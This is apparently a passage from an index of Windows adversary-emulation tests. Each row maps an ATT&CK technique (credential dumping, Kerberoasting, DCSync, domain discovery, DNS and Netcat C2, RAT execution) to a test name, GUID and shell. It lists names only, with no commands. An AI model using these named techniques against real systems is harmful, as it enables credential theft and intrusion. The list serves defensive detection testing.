779 credential-access T1552.001 Unsecured Credentials: Credentials In Files 9 WinPwn - passhunt 00e3e3c7-6c3c-455e-bd4b-461c7f0e7797 powershell
780 credential-access T1552.001 Unsecured Credentials: Credentials In Files 10 WinPwn - SessionGopher c9dc9de3-f961-4284-bd2d-f959c9f9fda5 powershell
781 credential-access T1552.001 Unsecured Credentials: Credentials In Files 11 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials aaa87b0e-5232-4649-ae5c-f1724a4b2798 powershell
782 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
783 credential-access T1552.006 Unsecured Credentials: Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
784 credential-access T1056.002 Input Capture: GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
785 credential-access T1110.004 Brute Force: Credential Stuffing 3 Brute Force:Credential Stuffing using Kerbrute Tool 4852c630-87a9-409b-bb5e-5dc12c9ebcde powershell
786 credential-access T1187 Forced Authentication 1 PetitPotam 485ce873-2e65-4706-9c7e-ae3ab9e14213 powershell
787 credential-access T1187 Forced Authentication 2 WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS 7f06b25c-799e-40f1-89db-999c9cc84317 powershell
788 credential-access T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket 1 Crafting Active Directory silver tickets with mimikatz 385e59aa-113e-4711-84d9-f637aef01f2c powershell
789 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 1 Access Saved Credentials via VaultCmd 9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439 command_prompt
790 credential-access T1555.004 Credentials from Password Stores: Windows Credential Manager 2 WinPwn - Loot local Credentials - Invoke-WCMDump fa714db1-63dd-479e-a58e-7b2b52ca5997 powershell
791 credential-access T1003.003 OS Credential Dumping: NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
792 credential-access T1003.003 OS Credential Dumping: NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
793 credential-access T1003.003 OS Credential Dumping: NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
794 credential-access T1003.003 OS Credential Dumping: NTDS 4 Create Volume Shadow Copy with WMI 224f7de0-8f0a-4a94-b5d8-989b036c86da command_prompt
795 credential-access T1003.003 OS Credential Dumping: NTDS 5 Create Volume Shadow Copy remotely with WMI d893459f-71f0-484d-9808-ec83b2b64226 command_prompt
796 credential-access T1003.003 OS Credential Dumping: NTDS 6 Create Volume Shadow Copy remotely (WMI) with esentutl 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865 command_prompt
797 credential-access T1003.003 OS Credential Dumping: NTDS 7 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
798 credential-access T1003.003 OS Credential Dumping: NTDS 8 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
799 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
800 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 2 Rubeus kerberoast 14625569-6def-4497-99ac-8e7817105b55 powershell
801 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 3 Extract all accounts in use as SPN using setspn e6f4affd-d826-4871-9a62-6c9004b8fe06 command_prompt
802 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 4 Request A Single Ticket via PowerShell 988539bc-2ed7-4e62-aec6-7c5cf6680863 powershell
803 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 5 Request All Tickets via PowerShell 902f4ed2-1aba-4133-90f2-cff6d299d6da powershell
804 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 6 WinPwn - Kerberoasting 78d10e20-c874-45f2-a9df-6fea0120ec27 powershell
805 credential-access T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting 7 WinPwn - PowerSharpPack - Kerberoasting Using Rubeus 29094950-2c96-4cbd-b5e4-f7c65079678f powershell
806 credential-access T1003.006 OS Credential Dumping: DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
807 credential-access T1003.006 OS Credential Dumping: DCSync 2 Run DSInternals Get-ADReplAccount a0bced08-3fc5-4d8b-93b7-e8344739376e powershell
808 credential-access T1056.004 Input Capture: Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
809 discovery T1033 System Owner/User Discovery 1 System Owner/User Discovery 4c4959bf-addf-4b4a-be86-8d09cc1857aa command_prompt
810 discovery T1033 System Owner/User Discovery 3 Find computers where user has session - Stealth mode (PowerView) 29857f27-a36f-4f7e-8084-4557cd6207ca powershell
811 discovery T1033 System Owner/User Discovery 4 User Discovery With Env Vars PowerShell Script dcb6cdee-1fb0-4087-8bf8-88cfd136ba51 powershell
812 discovery T1033 System Owner/User Discovery 5 GetCurrent User with PowerShell Script 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b powershell
813 discovery T1615 Group Policy Discovery 1 Display group policy information via gpresult 0976990f-53b1-4d3f-a185-6df5be429d3b command_prompt
814 discovery T1615 Group Policy Discovery 2 Get-DomainGPO to display group policy information via PowerView 4e524c4e-0e02-49aa-8df5-93f3f7959b9f powershell
815 discovery T1615 Group Policy Discovery 3 WinPwn - GPOAudit bc25c04b-841e-4965-855f-d1f645d7ab73 powershell
816 discovery T1615 Group Policy Discovery 4 WinPwn - GPORemoteAccessPolicy 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59 powershell
817 discovery T1615 Group Policy Discovery 5 MSFT Get-GPO Cmdlet 52778a8f-a10b-41a4-9eae-52ddb74072bf powershell
818 discovery T1087.002 Account Discovery: Domain Account 1 Enumerate all accounts (Domain) 6fbc9e68-5ad7-444a-bd11-8bf3136c477e command_prompt
819 discovery T1087.002 Account Discovery: Domain Account 2 Enumerate all accounts via PowerShell (Domain) 8b8a6449-be98-4f42-afd2-dedddc7453b2 powershell
820 discovery T1087.002 Account Discovery: Domain Account 3 Enumerate logged on users via CMD (Domain) 161dcd85-d014-4f5e-900c-d3eaae82a0f7 command_prompt
821 discovery T1087.002 Account Discovery: Domain Account 4 Automated AD Recon (ADRecon) 95018438-454a-468c-a0fa-59c800149b59 powershell
822 discovery T1087.002 Account Discovery: Domain Account 5 Adfind -Listing password policy 736b4f53-f400-4c22-855d-1a6b5a551600 command_prompt
823 discovery T1087.002 Account Discovery: Domain Account 6 Adfind - Enumerate Active Directory Admins b95fd967-4e62-4109-b48d-265edfd28c3a command_prompt
824 discovery T1087.002 Account Discovery: Domain Account 7 Adfind - Enumerate Active Directory User Objects e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 command_prompt
825 discovery T1087.002 Account Discovery: Domain Account 8 Adfind - Enumerate Active Directory Exchange AD Objects 5e2938fb-f919-47b6-8b29-2f6a1f718e99 command_prompt
826 discovery T1087.002 Account Discovery: Domain Account 9 Enumerate Default Domain Admin Details (Domain) c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef command_prompt
827 discovery T1087.002 Account Discovery: Domain Account 10 Enumerate Active Directory for Unconstrained Delegation 46f8dbe9-22a5-4770-8513-66119c5be63b powershell
828 discovery T1087.002 Account Discovery: Domain Account 11 Get-DomainUser with PowerView 93662494-5ed7-4454-a04c-8c8372808ac2 powershell
829 discovery T1087.002 Account Discovery: Domain Account 12 Enumerate Active Directory Users with ADSISearcher 02e8be5a-3065-4e54-8cc8-a14d138834d3 powershell
830 discovery T1087.002 Account Discovery: Domain Account 13 Enumerate Linked Policies In ADSISearcher Discovery 7ab0205a-34e4-4a44-9b04-e1541d1a57be powershell
831 discovery T1087.002 Account Discovery: Domain Account 14 Enumerate Root Domain linked policies Discovery 00c652e2-0750-4ca6-82ff-0204684a6fe4 powershell
832 discovery T1087.002 Account Discovery: Domain Account 15 WinPwn - generaldomaininfo ce483c35-c74b-45a7-a670-631d1e69db3d powershell
833 discovery T1087.002 Account Discovery: Domain Account 16 Kerbrute - userenum f450461c-18d1-4452-9f0d-2c42c3f08624 powershell
834 discovery T1087.001 Account Discovery: Local Account 8 Enumerate all accounts on Windows (Local) 80887bec-5a9b-4efc-a81d-f83eb2eb32ab command_prompt
835 discovery T1087.001 Account Discovery: Local Account 9 Enumerate all accounts via PowerShell (Local) ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b powershell
836 discovery T1087.001 Account Discovery: Local Account 10 Enumerate logged on users via CMD (Local) a138085e-bfe5-46ba-a242-74a6fb884af3 command_prompt
837 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
838 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
839 discovery T1069.002 Permission Groups Discovery: Domain Groups 1 Basic Permission Groups Discovery Windows (Domain) dd66d77d-8998-48c0-8024-df263dc2ce5d command_prompt
840 discovery T1069.002 Permission Groups Discovery: Domain Groups 2 Permission Groups Discovery PowerShell (Domain) 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 powershell
841 discovery T1069.002 Permission Groups Discovery: Domain Groups 3 Elevated group enumeration using net group (Domain) 0afb5163-8181-432e-9405-4322710c0c37 command_prompt
842 discovery T1069.002 Permission Groups Discovery: Domain Groups 4 Find machines where user has local admin access (PowerView) a2d71eee-a353-4232-9f86-54f4288dd8c1 powershell
843 discovery T1069.002 Permission Groups Discovery: Domain Groups 5 Find local admins on all machines in domain (PowerView) a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd powershell
844 discovery T1069.002 Permission Groups Discovery: Domain Groups 6 Find Local Admins via Group Policy (PowerView) 64fdb43b-5259-467a-b000-1b02c00e510a powershell
845 discovery T1069.002 Permission Groups Discovery: Domain Groups 7 Enumerate Users Not Requiring Pre Auth (ASRepRoast) 870ba71e-6858-4f6d-895c-bb6237f6121b powershell
846 discovery T1069.002 Permission Groups Discovery: Domain Groups 8 Adfind - Query Active Directory Groups 48ddc687-82af-40b7-8472-ff1e742e8274 command_prompt
847 discovery T1069.002 Permission Groups Discovery: Domain Groups 9 Enumerate Active Directory Groups with Get-AdGroup 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8 powershell
848 discovery T1069.002 Permission Groups Discovery: Domain Groups 10 Enumerate Active Directory Groups with ADSISearcher 9f4e344b-8434-41b3-85b1-d38f29d148d0 powershell
849 discovery T1069.002 Permission Groups Discovery: Domain Groups 11 Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8 powershell
850 discovery T1069.002 Permission Groups Discovery: Domain Groups 12 Get-DomainGroupMember with PowerView 46352f40-f283-4fe5-b56d-d9a71750e145 powershell
851 discovery T1069.002 Permission Groups Discovery: Domain Groups 13 Get-DomainGroup with PowerView 5a8a181c-2c8e-478d-a943-549305a01230 powershell
852 discovery T1007 System Service Discovery 1 System Service Discovery 89676ba1-b1f8-47ee-b940-2e1a113ebc71 command_prompt
853 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
854 discovery T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
855 discovery T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
856 discovery T1040 Network Sniffing 5 Windows Internal pktmon capture c67ba807-f48b-446e-b955-e4928cd1bf91 command_prompt
857 discovery T1040 Network Sniffing 6 Windows Internal pktmon set filter 855fb8b4-b8ab-4785-ae77-09f5df7bff55 command_prompt
858 discovery T1135 Network Share Discovery 3 Network Share Discovery command prompt 20f1097d-81c1-405c-8380-32174d493bbb command_prompt
859 discovery T1135 Network Share Discovery 4 Network Share Discovery PowerShell 1b0814d1-bb24-402d-9615-1b20c50733fb powershell
860 discovery T1135 Network Share Discovery 5 View available share drives ab39a04f-0c93-4540-9ff2-83f862c385ae command_prompt
861 discovery T1135 Network Share Discovery 6 Share Discovery with PowerView b1636f0a-ba82-435c-b699-0d78794d8bfd powershell
862 discovery T1135 Network Share Discovery 7 PowerView ShareFinder d07e4cc1-98ae-447e-9d31-36cb430d28c4 powershell
863 discovery T1135 Network Share Discovery 8 WinPwn - shareenumeration 987901d1-5b87-4558-a6d9-cffcabc638b8 powershell
864 discovery T1120 Peripheral Device Discovery 1 Win32_PnPEntity Hardware Inventory 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 powershell
865 discovery T1120 Peripheral Device Discovery 2 WinPwn - printercheck cb6e76ca-861e-4a7f-be08-564caa3e6f75 powershell
866 discovery T1082 System Information Discovery 1 System Information Discovery 66703791-c902-4560-8770-42b8a91f7667 command_prompt
867 discovery T1082 System Information Discovery 6 Hostname Discovery (Windows) 85cfbf23-4a1e-4342-8792-007e004b975f command_prompt
868 discovery T1082 System Information Discovery 8 Windows MachineGUID Discovery 224b4daf-db44-404e-b6b2-f4d1f0126ef8 command_prompt
869 discovery T1082 System Information Discovery 9 Griffon Recon 69bd4abe-8759-49a6-8d21-0f15822d6370 powershell
870 discovery T1082 System Information Discovery 10 Environment variables discovery on windows f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 command_prompt
871 discovery T1082 System Information Discovery 13 WinPwn - winPEAS eea1d918-825e-47dd-acc2-814d6c58c0e1 powershell
872 discovery T1082 System Information Discovery 14 WinPwn - itm4nprivesc 3d256a2f-5e57-4003-8eb6-64d91b1da7ce powershell
873 discovery T1082 System Information Discovery 15 WinPwn - Powersploits privesc checks 345cb8e4-d2de-4011-a580-619cf5a9e2d7 powershell
874 discovery T1082 System Information Discovery 16 WinPwn - General privesc checks 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed powershell
875 discovery T1082 System Information Discovery 17 WinPwn - GeneralRecon 7804659b-fdbf-4cf6-b06a-c03e758590e8 powershell
876 discovery T1082 System Information Discovery 18 WinPwn - Morerecon 3278b2f6-f733-4875-9ef4-bfed34244f0a powershell
877 discovery T1082 System Information Discovery 19 WinPwn - RBCD-Check dec6a0d8-bcaf-4c22-9d48-2aee59fb692b powershell
878 discovery T1082 System Information Discovery 20 WinPwn - PowerSharpPack - Watson searching for missing windows patches 07b18a66-6304-47d2-bad0-ef421eb2e107 powershell
879 discovery T1082 System Information Discovery 21 WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors efb79454-1101-4224-a4d0-30c9c8b29ffc powershell
880 discovery T1082 System Information Discovery 22 WinPwn - PowerSharpPack - Seatbelt 5c16ceb4-ba3a-43d7-b848-a13c1f216d95 powershell
881 discovery T1010 Application Window Discovery 1 List Process Main Windows - C# .NET fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 command_prompt
882 discovery T1217 Browser Bookmark Discovery 4 List Google Chrome / Opera Bookmarks on Windows with powershell faab755e-4299-48ec-8202-fc7885eb6545 powershell
883 discovery T1217 Browser Bookmark Discovery 5 List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt 76f71e2f-480e-4bed-b61e-398fe17499d5 command_prompt
884 discovery T1217 Browser Bookmark Discovery 6 List Mozilla Firefox bookmarks on Windows with command prompt 4312cdbc-79fc-4a9c-becc-53d49c734bc5 command_prompt
885 discovery T1217 Browser Bookmark Discovery 7 List Internet Explorer Bookmarks using the command prompt 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 command_prompt
886 discovery T1016 System Network Configuration Discovery 1 System Network Configuration Discovery on Windows 970ab6a1-0157-4f3f-9a73-ec4166754b23 command_prompt
887 discovery T1016 System Network Configuration Discovery 2 List Windows Firewall Rules 038263cb-00f4-4b0a-98ae-0696c67e1752 command_prompt
888 discovery T1016 System Network Configuration Discovery 4 System Network Configuration Discovery (TrickBot Style) dafaf052-5508-402d-bf77-51e0700c02e2 command_prompt
889 discovery T1016 System Network Configuration Discovery 5 List Open Egress Ports 4b467538-f102-491d-ace7-ed487b853bf5 powershell
890 discovery T1016 System Network Configuration Discovery 6 Adfind - Enumerate Active Directory Subnet Objects 9bb45dd7-c466-4f93-83a1-be30e56033ee command_prompt
891 discovery T1016 System Network Configuration Discovery 7 Qakbot Recon 121de5c6-5818-4868-b8a7-8fd07c455c1b command_prompt
892 discovery T1016 System Network Configuration Discovery 9 DNS Server Discovery Using nslookup 34557863-344a-468f-808b-a1bfb89b4fa9 command_prompt
893 discovery T1482 Domain Trust Discovery 1 Windows - Discover domain trusts with dsquery 4700a710-c821-4e17-a3ec-9e4c81d6845f command_prompt
894 discovery T1482 Domain Trust Discovery 2 Windows - Discover domain trusts with nltest 2e22641d-0498-48d2-b9ff-c71e496ccdbe command_prompt
895 discovery T1482 Domain Trust Discovery 3 Powershell enumerate domains and forests c58fbc62-8a62-489e-8f2d-3565d7d96f30 powershell
896 discovery T1482 Domain Trust Discovery 4 Adfind - Enumerate Active Directory OUs d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec command_prompt
897 discovery T1482 Domain Trust Discovery 5 Adfind - Enumerate Active Directory Trusts 15fe436d-e771-4ff3-b655-2dca9ba52834 command_prompt
898 discovery T1482 Domain Trust Discovery 6 Get-DomainTrust with PowerView f974894c-5991-4b19-aaf5-7cc2fe298c5d powershell
899 discovery T1482 Domain Trust Discovery 7 Get-ForestTrust with PowerView 58ed10e8-0738-4651-8408-3a3e9a526279 powershell
900 discovery T1482 Domain Trust Discovery 8 TruffleSnout - Listing AD Infrastructure ea1b4f2d-5b82-4006-b64f-f2845608a3bf command_prompt
901 discovery T1083 File and Directory Discovery 1 File and Directory Discovery (cmd.exe) 0e36303b-6762-4500-b003-127743b80ba6 command_prompt
902 discovery T1083 File and Directory Discovery 2 File and Directory Discovery (PowerShell) 2158908e-b7ef-4c21-8a83-3ce4dd05a924 powershell
903 discovery T1083 File and Directory Discovery 5 Simulating MAZE Directory Enumeration c6c34f61-1c3e-40fb-8a58-d017d88286d8 powershell
904 discovery T1083 File and Directory Discovery 6 Launch DirLister Executable c5bec457-43c9-4a18-9a24-fe151d8971b7 powershell
905 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
906 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
907 discovery T1049 System Network Connections Discovery 4 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
908 discovery T1057 Process Discovery 2 Process Discovery - tasklist c5806a4f-62b8-4900-980b-c7ec004e9908 command_prompt
909 discovery T1057 Process Discovery 3 Process Discovery - Get-Process 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34 powershell
910 discovery T1057 Process Discovery 4 Process Discovery - get-wmiObject b51239b4-0129-474f-a2b4-70f855b9f2c2 powershell
911 discovery T1057 Process Discovery 5 Process Discovery - wmic process 640cbf6d-659b-498b-ba53-f6dd1a1cc02c command_prompt
912 discovery T1069.001 Permission Groups Discovery: Local Groups 2 Basic Permission Groups Discovery Windows (Local) 1f454dd6-e134-44df-bebb-67de70fb6cd8 command_prompt
913 discovery T1069.001 Permission Groups Discovery: Local Groups 3 Permission Groups Discovery PowerShell (Local) a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 powershell
914 discovery T1069.001 Permission Groups Discovery: Local Groups 4 SharpHound3 - LocalAdmin e03ada14-0980-4107-aff1-7783b2b59bb1 powershell
915 discovery T1069.001 Permission Groups Discovery: Local Groups 5 Wmic Group Discovery 7413be50-be8e-430f-ad4d-07bf197884b2 powershell
916 discovery T1069.001 Permission Groups Discovery: Local Groups 6 WMIObject Group Discovery 69119e58-96db-4110-ad27-954e48f3bb13 powershell
917 discovery T1201 Password Policy Discovery 5 Examine local password policy - Windows 4588d243-f24e-4549-b2e3-e627acc089f6 command_prompt
918 discovery T1201 Password Policy Discovery 6 Examine domain password policy - Windows 46c2c362-2679-4ef5-aec9-0e958e135be4 command_prompt
919 discovery T1201 Password Policy Discovery 8 Get-DomainPolicy with PowerView 3177f4da-3d4b-4592-8bdc-aa23d0b2e843 powershell
920 discovery T1201 Password Policy Discovery 9 Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy b2698b33-984c-4a1c-93bb-e4ba72a0babb powershell
921 discovery T1201 Password Policy Discovery 10 Use of SecEdit.exe to export the local security policy (including the password policy) 510cc97f-56ac-4cd3-a198-d3218c23d889 command_prompt
922 discovery T1614.001 System Location Discovery: System Language Discovery 1 Discover System Language by Registry Query 631d4cf1-42c9-4209-8fe9-6bd4de9421be command_prompt
923 discovery T1614.001 System Location Discovery: System Language Discovery 2 Discover System Language with chcp d91473ca-944e-477a-b484-0e80217cd789 command_prompt
924 discovery T1012 Query Registry 1 Query Registry 8f7578c4-9863-4d83-875c-a565573bbdf0 command_prompt
925 discovery T1012 Query Registry 2 Enumerate COM Objects in Registry with Powershell 0d80d088-a84c-4353-af1a-fc8b439f1564 powershell
926 discovery T1518.001 Software Discovery: Security Software Discovery 1 Security Software Discovery f92a380f-ced9-491f-b338-95a991418ce2 command_prompt
927 discovery T1518.001 Software Discovery: Security Software Discovery 2 Security Software Discovery - powershell 7f566051-f033-49fb-89de-b6bacab730f0 powershell
928 discovery T1518.001 Software Discovery: Security Software Discovery 5 Security Software Discovery - Sysmon Service fe613cf3-8009-4446-9a0f-bc78a15b66c9 command_prompt
929 discovery T1518.001 Software Discovery: Security Software Discovery 6 Security Software Discovery - AV Discovery via WMI 1553252f-14ea-4d3b-8a08-d7a4211aa945 command_prompt
930 discovery T1018 Remote System Discovery 1 Remote System Discovery - net 85321a9c-897f-4a60-9f20-29788e50bccd command_prompt
931 discovery T1018 Remote System Discovery 2 Remote System Discovery - net group Domain Computers f1bf6c8f-9016-4edf-aff9-80b65f5d711f command_prompt
932 discovery T1018 Remote System Discovery 3 Remote System Discovery - nltest 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 command_prompt
933 discovery T1018 Remote System Discovery 4 Remote System Discovery - ping sweep 6db1f57f-d1d5-4223-8a66-55c9c65a9592 command_prompt
934 discovery T1018 Remote System Discovery 5 Remote System Discovery - arp 2d5a61f5-0447-4be4-944a-1f8530ed6574 command_prompt
935 discovery T1018 Remote System Discovery 8 Remote System Discovery - nslookup baa01aaa-5e13-45ec-8a0d-e46c93c9760f powershell
936 discovery T1018 Remote System Discovery 9 Remote System Discovery - adidnsdump 95e19466-469e-4316-86d2-1dc401b5a959 command_prompt
937 discovery T1018 Remote System Discovery 10 Adfind - Enumerate Active Directory Computer Objects a889f5be-2d54-4050-bd05-884578748bb4 command_prompt
938 discovery T1018 Remote System Discovery 11 Adfind - Enumerate Active Directory Domain Controller Objects 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e command_prompt
939 discovery T1018 Remote System Discovery 15 Enumerate domain computers within Active Directory using DirectorySearcher 962a6017-1c09-45a6-880b-adc9c57cb22e powershell
940 discovery T1018 Remote System Discovery 16 Enumerate Active Directory Computers with Get-AdComputer 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf powershell
941 discovery T1018 Remote System Discovery 17 Enumerate Active Directory Computers with ADSISearcher 64ede6ac-b57a-41c2-a7d1-32c6cd35397d powershell
942 discovery T1018 Remote System Discovery 18 Get-DomainController with PowerView b9d2e8ca-5520-4737-8076-4f08913da2c4 powershell
943 discovery T1018 Remote System Discovery 19 Get-wmiobject to Enumerate Domain Controllers e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad powershell
944 discovery T1018 Remote System Discovery 20 Remote System Discovery - net group Domain Controller 5843529a-5056-4bc1-9c13-a311e2af4ca0 command_prompt
945 discovery T1046 Network Service Scanning 3 Port Scan NMap for Windows d696a3cb-d7a8-4976-8eb5-5af4abf2e3df powershell
946 discovery T1046 Network Service Scanning 4 Port Scan using python 6ca45b04-9f15-4424-b9d3-84a217285a5c powershell
947 discovery T1046 Network Service Scanning 5 WinPwn - spoolvulnscan 54574908-f1de-4356-9021-8053dd57439a powershell
948 discovery T1046 Network Service Scanning 6 WinPwn - MS17-10 97585b04-5be2-40e9-8c31-82157b8af2d6 powershell
949 discovery T1046 Network Service Scanning 7 WinPwn - bluekeep 1cca5640-32a9-46e6-b8e0-fabbe2384a73 powershell
950 discovery T1046 Network Service Scanning 8 WinPwn - fruit bb037826-cbe8-4a41-93ea-b94059d6bb98 powershell
951 discovery T1518 Software Discovery 1 Find and Display Internet Explorer Browser Version 68981660-6670-47ee-a5fa-7e74806420a4 command_prompt
952 discovery T1518 Software Discovery 2 Applications Installed c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b powershell
953 discovery T1518 Software Discovery 4 WinPwn - Dotnetsearch 7e79a1b6-519e-433c-ad55-3ff293667101 powershell
954 discovery T1518 Software Discovery 5 WinPwn - DotNet 10ba02d0-ab76-4f80-940d-451633f24c5b powershell
955 discovery T1518 Software Discovery 6 WinPwn - powerSQL 0bb64470-582a-4155-bde2-d6003a95ed34 powershell
956 discovery T1124 System Time Discovery 1 System Time Discovery 20aba24b-e61f-4b26-b4ce-4784f763ca20 command_prompt
957 discovery T1124 System Time Discovery 2 System Time Discovery - PowerShell 1d5711d6-655c-4a47-ae9c-6503c74fa877 powershell
958 discovery T1124 System Time Discovery 4 System Time Discovery W32tm as a Delay d5d5a6b0-0f92-42d8-985d-47aafa2dd4db command_prompt
959 command-and-control T1132.001 Data Encoding: Standard Encoding 2 XOR Encoded data. c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 powershell
960 command-and-control T1071.004 Application Layer Protocol: DNS 1 DNS Large Query Volume 1700f5d6-5a44-487b-84de-bc66f507b0a6 powershell
961 command-and-control T1071.004 Application Layer Protocol: DNS 2 DNS Regular Beaconing 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 powershell
962 command-and-control T1071.004 Application Layer Protocol: DNS 3 DNS Long Domain Query fef31710-223a-40ee-8462-a396d6b66978 powershell
963 command-and-control T1071.004 Application Layer Protocol: DNS 4 DNS C2 e7bf9802-2e78-4db9-93b5-181b7bcd37d7 powershell
964 command-and-control T1219 Remote Access Software 1 TeamViewer Files Detected Test on Windows 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 powershell
965 command-and-control T1219 Remote Access Software 2 AnyDesk Files Detected Test on Windows 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 powershell
966 command-and-control T1219 Remote Access Software 3 LogMeIn Files Detected Test on Windows d03683ec-aae0-42f9-9b4c-534780e0f8e1 powershell
967 command-and-control T1219 Remote Access Software 4 GoToAssist Files Detected Test on Windows 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 powershell
968 command-and-control T1219 Remote Access Software 5 ScreenConnect Application Download and Install on Windows 4a18cc4e-416f-4966-9a9d-75731c4684c0 powershell
969 command-and-control T1219 Remote Access Software 6 Ammyy Admin Software Execution 0ae9e327-3251-465a-a53b-485d4e3f58fa powershell
970 command-and-control T1219 Remote Access Software 7 RemotePC Software Execution fbff3f1f-b0bf-448e-840f-7e1687affdce powershell
971 command-and-control T1219 Remote Access Software 8 NetSupport - RAT Execution ecca999b-e0c8-40e8-8416-ad320b146a75 powershell
972 command-and-control T1219 Remote Access Software 9 UltraViewer - RAT Execution 19acf63b-55c4-4b6a-8552-00a8865105c8 powershell
973 command-and-control T1219 Remote Access Software 10 UltraVNC Execution 42e51815-a6cc-4c75-b970-3f0ff54b610e powershell
974 command-and-control T1572 Protocol Tunneling 1 DNS over HTTPS Large Query Volume ae9ef4b0-d8c1-49d4-8758-06206f19af0a powershell
975 command-and-control T1572 Protocol Tunneling 2 DNS over HTTPS Regular Beaconing 0c5f9705-c575-42a6-9609-cbbff4b2fc9b powershell
976 command-and-control T1572 Protocol Tunneling 3 DNS over HTTPS Long Domain Query 748a73d5-cea4-4f34-84d8-839da5baa99c powershell
977 command-and-control T1090.003 Proxy: Multi-hop Proxy 1 Psiphon 14d55ca0-920e-4b44-8425-37eedd72b173 powershell
978 command-and-control T1090.003 Proxy: Multi-hop Proxy 2 Tor Proxy Usage - Windows 7b9d85e5-c4ce-4434-8060-d3de83595e69 powershell
979 command-and-control T1571 Non-Standard Port 1 Testing usage of uncommonly used port with PowerShell 21fe622f-8e53-4b31-ba83-6d333c2583f4 powershell
980 command-and-control T1573 Encrypted Channel 1 OpenSSL C2 21caf58e-87ad-440c-a6b8-3ac259964003 powershell
981 command-and-control T1095 Non-Application Layer Protocol 1 ICMP C2 0268e63c-e244-42db-bef7-72a9e59fc1fc powershell
982 command-and-control T1095 Non-Application Layer Protocol 2 Netcat C2 bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 powershell
983 command-and-control T1095 Non-Application Layer Protocol 3 Powercat C2 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e powershell
984 command-and-control T1071.001 Application Layer Protocol: Web Protocols 1 Malicious User Agents - Powershell 81c13829-f6c9-45b8-85a6-053366d55297 powershell
985 command-and-control T1071.001 Application Layer Protocol: Web Protocols 2 Malicious User Agents - CMD dc3488b0-08c7-4fea-b585-905c83b48180 command_prompt
